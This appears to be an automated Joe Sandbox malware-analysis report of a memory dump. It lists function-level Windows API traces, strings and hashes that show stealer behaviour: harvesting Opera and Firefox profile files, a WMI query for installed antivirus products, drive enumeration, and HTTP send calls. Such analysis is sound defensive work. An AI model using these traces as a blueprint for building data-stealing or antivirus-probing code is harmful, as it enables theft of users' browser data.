Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$FileOpenReadRequestlstrcpy$ConnectCrackInfoOptionQuerySendlstrlen
String ID: ERROR$GET
API String ID: 1863336362-3591763792
Opcode ID: 0f67009fbf7cbbc68c08b1a8f3387cfa7beef474e4c265804f63dc4e633702b9
Instruction ID: 1ac627e5dad41aa046ddd859517fa52cc070feb9a932d89590bb6b8620beea7d
Opcode Fuzzy Hash: 0f67009fbf7cbbc68c08b1a8f3387cfa7beef474e4c265804f63dc4e633702b9
Instruction Fuzzy Hash: 1F515472A406186BEB20EB64DC46FEF7779EF44700F104139F605BB2D1DB786A058BA9

Function 00401110 Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 658fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,00000000,?,00000000), ref: 004012D9
StrCmpCA.SHLWAPI(?,004201DC), ref: 004012FC
StrCmpCA.SHLWAPI(?,004201D8), ref: 00401316
FindFirstFileA.KERNEL32(00000000,?,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,?,004201E0,?,?), ref: 0040140D

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

DeleteFileA.KERNEL32(00000000), ref: 00401668
FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004016A4
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004016B3
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004015F6

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004018F5

Part of subcall function 00406C20: LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9

DeleteFileA.KERNEL32(00000000), ref: 00401967
FindNextFileA.KERNEL32(00000000,?), ref: 004019A8
FindClose.KERNEL32(00000000), ref: 004019B7

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,00E50050,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Strings

\*.*, xrefs: 004011EB

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2220404975-1173974218
Opcode ID: 0935ae0aaf77fd51b0952e85c1cbf099acac9e95384f7414c933227a788e5274
Instruction ID: 1d754b9f1f181e8b004311f1424a94fcc02efae78f4dcff2990e7204b081244d
Opcode Fuzzy Hash: 0935ae0aaf77fd51b0952e85c1cbf099acac9e95384f7414c933227a788e5274
Instruction Fuzzy Hash: FF3202729101186ADB28FBA1DC52EEE7378AF54304F54817EB506764D2EF386B4CCB68

Function 004156C0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004156DF
FindFirstFileA.KERNEL32(?,?), ref: 004156F6
StrCmpCA.SHLWAPI(?,004201DC), ref: 0041571C
StrCmpCA.SHLWAPI(?,004201D8), ref: 00415736
lstrcatA.KERNEL32(?,00E59F38,?,00000104,?,00000104), ref: 00415774
lstrcatA.KERNEL32(?,00E59E98), ref: 00415788
lstrcatA.KERNEL32(?,?), ref: 0041579C
lstrcatA.KERNEL32(?,?), ref: 004157AA
lstrcatA.KERNEL32(?,004201E0), ref: 004157BC
lstrcatA.KERNEL32(?,?), ref: 004157D0

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

FindNextFileA.KERNEL32(00000000,?), ref: 00415863
FindClose.KERNEL32(00000000), ref: 00415872

Strings

%s\%s, xrefs: 004156D9

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1833283839-4073750446
Opcode ID: e31d2834b5800846581c50843b59fcb23822e472b9e87247f18449742fc92fff
Instruction ID: 0b78cd701ac643c87a03d62035dd32dfabddf56532c9e59c0612692b5200a2eb
Opcode Fuzzy Hash: e31d2834b5800846581c50843b59fcb23822e472b9e87247f18449742fc92fff
Instruction Fuzzy Hash: 9B41BAB2510218ABCB14FBB0DC85DEE337DAF84304F4485ADF605A2091EB749B88CFA5

Function 004153C0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 161stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0041541D
memset.MSVCRT ref: 0041543E
GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00415447
lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415466
lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415484
lstrcpyA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 004154A7
lstrlenA.KERNEL32(00000000), ref: 0041550E

Strings

%DRIVE_FIXED%, xrefs: 0041548B
pVA, xrefs: 00415572, 004155AC, 004154F7, 004154FC, 00415577
*%DRIVE_FIXED%*, xrefs: 004153CF
%DRIVE_REMOVABLE%, xrefs: 0041546D
*%DRIVE_REMOVABLE%*, xrefs: 004153EE

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$pVA
API String ID: 1884655365-1202875852
Opcode ID: 651858862d990c101e44fd5ff59ef2c2d412456b491b06cbe97d18b12f29a8ec
Instruction ID: bbf7442ac75b1dedefd6e11ab23fcaa94ebd49349dc0b1136d9cad4923d5d44c
Opcode Fuzzy Hash: 651858862d990c101e44fd5ff59ef2c2d412456b491b06cbe97d18b12f29a8ec
Instruction Fuzzy Hash: 87516671600244ABDB70FF71DC86FEE3369AF44704F50803AFA0966192DF786A49CB69

Function 0040A2C0 Relevance: 19.8, APIs: 7, Strings: 4, Instructions: 512fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004201E9,00000000,?,?), ref: 0040A322
StrCmpCA.SHLWAPI(?,004201DC), ref: 0040A34C
StrCmpCA.SHLWAPI(?,004201D8), ref: 0040A366
StrCmpCA.SHLWAPI(00000000,Opera,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9), ref: 0040A3DD
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A3F1
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A405

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Part of subcall function 00409D40: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004201E9,?,75B0AC90,?), ref: 00409D8B
Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201DC), ref: 00409DAE
Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201D8), ref: 00409DC8

FindNextFileA.KERNEL32(?,?), ref: 0040A984

Strings

Opera, xrefs: 0040A3CF
Opera Crypto, xrefs: 0040A3F7
Opera GX, xrefs: 0040A3E3
\*.*, xrefs: 0040A2D9

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 3824151033-1710495004
Opcode ID: 398b5459885c3bdca9ce892555a116d0a44531d8338a3527c2d37fb0c438f566
Instruction ID: c055696588133eeff082df826d79585fe0f613ba782fed39e499d95d60d79d7b
Opcode Fuzzy Hash: 398b5459885c3bdca9ce892555a116d0a44531d8338a3527c2d37fb0c438f566
Instruction Fuzzy Hash: 5A1233729101086BCB28FB71DC52EED7378AF54704F40857EB506729D2EF786A4CCAA9

Function 00410900 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
VariantInit.OLEAUT32(?), ref: 004109E3

Part of subcall function 00410CF0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A09,00000030,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000), ref: 00410CF8
Part of subcall function 00410CF0: CharToOemW.USER32(?,00000000), ref: 00410D05

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

VariantClear.OLEAUT32(?), ref: 00410A1B

Strings

displayName, xrefs: 004109F5
Select * From AntiVirusProduct, xrefs: 004109A1
Unknown, xrefs: 00410A3E
root\SecurityCenter2, xrefs: 0041096B
WQL, xrefs: 004109A6

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 685420537-2561087649
Opcode ID: 87aa53400a99d5c291a18064c614467eeea5bc9e82735329bb1475dada1603e8
Instruction ID: 111392f2127a0d2122f17b414c1528a281c0ab609e0c548076d9d5dfd58a5577
Opcode Fuzzy Hash: 87aa53400a99d5c291a18064c614467eeea5bc9e82735329bb1475dada1603e8
Instruction Fuzzy Hash: A9415F71A01225ABCB20DB95DC45EEFBBBCEF49B60F10421AF515A7280C775AA41CBA4

Function 0040B390 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 283fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,00000000,?,?), ref: 0040B3F2
StrCmpCA.SHLWAPI(?,004201DC), ref: 0040B41C
StrCmpCA.SHLWAPI(?,004201D8), ref: 0040B436
StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040B4B0

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,00E50050,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B562
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B59A
DeleteFileA.KERNEL32(00000000,?,004201E9), ref: 0040B63E

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

FindNextFileA.KERNELBASE(00000000,?), ref: 0040B6F5
FindClose.KERNEL32(00000000), ref: 0040B704

Strings

prefs.js, xrefs: 0040B4A4

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$FindProcess$CloseCopyHeaplstrcat$AllocDeleteFirstHandleNextOpenSystemTerminateTimelstrlenmemsetwsprintf
String ID: prefs.js
API String ID: 874672723-3783873740
Opcode ID: 5dccad2cdc090ff762bdfdcd86304b64a5550157acf92d62edbe24b0dda0dcf2
Instruction ID: 4260c9570d047cb4ee5d2090f2cf981c79b292f60dd583d0dc47953d2b0846df
Opcode Fuzzy Hash: 5dccad2cdc090ff762bdfdcd86304b64a5550157acf92d62edbe24b0dda0dcf2
Instruction Fuzzy Hash: C2A11E72910108ABCB24FB71DC56AEE7778AF54304F40853EE905B35D2EF386A4DCA99

Function 004099F0 Relevance: 13.8, APIs: 9, Instructions: 251fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,?), ref: 00409A50
StrCmpCA.SHLWAPI(?,004201DC), ref: 00409A6D
StrCmpCA.SHLWAPI(?,004201D8), ref: 00409A87
StrCmpCA.SHLWAPI(?,00E5A1B8,00000000,?,?,?,004201E0,?,?,004201E9), ref: 00409B03
StrCmpCA.SHLWAPI(?,00E598D0), ref: 00409B69

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA

FindNextFileA.KERNELBASE(00000000,?), ref: 00409CDF
FindClose.KERNEL32(00000000), ref: 00409CEE

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$Find$Copylstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 1309316030-0
Opcode ID: 21e2c9ec6af1c3d04352dc7bab1d51facdad81dd5dc808e52cbe79bae57ff78e
Instruction ID: 9bfd207ce50c0c1877f45400523c984a60adf101312f3de179d0de13c9639d5b
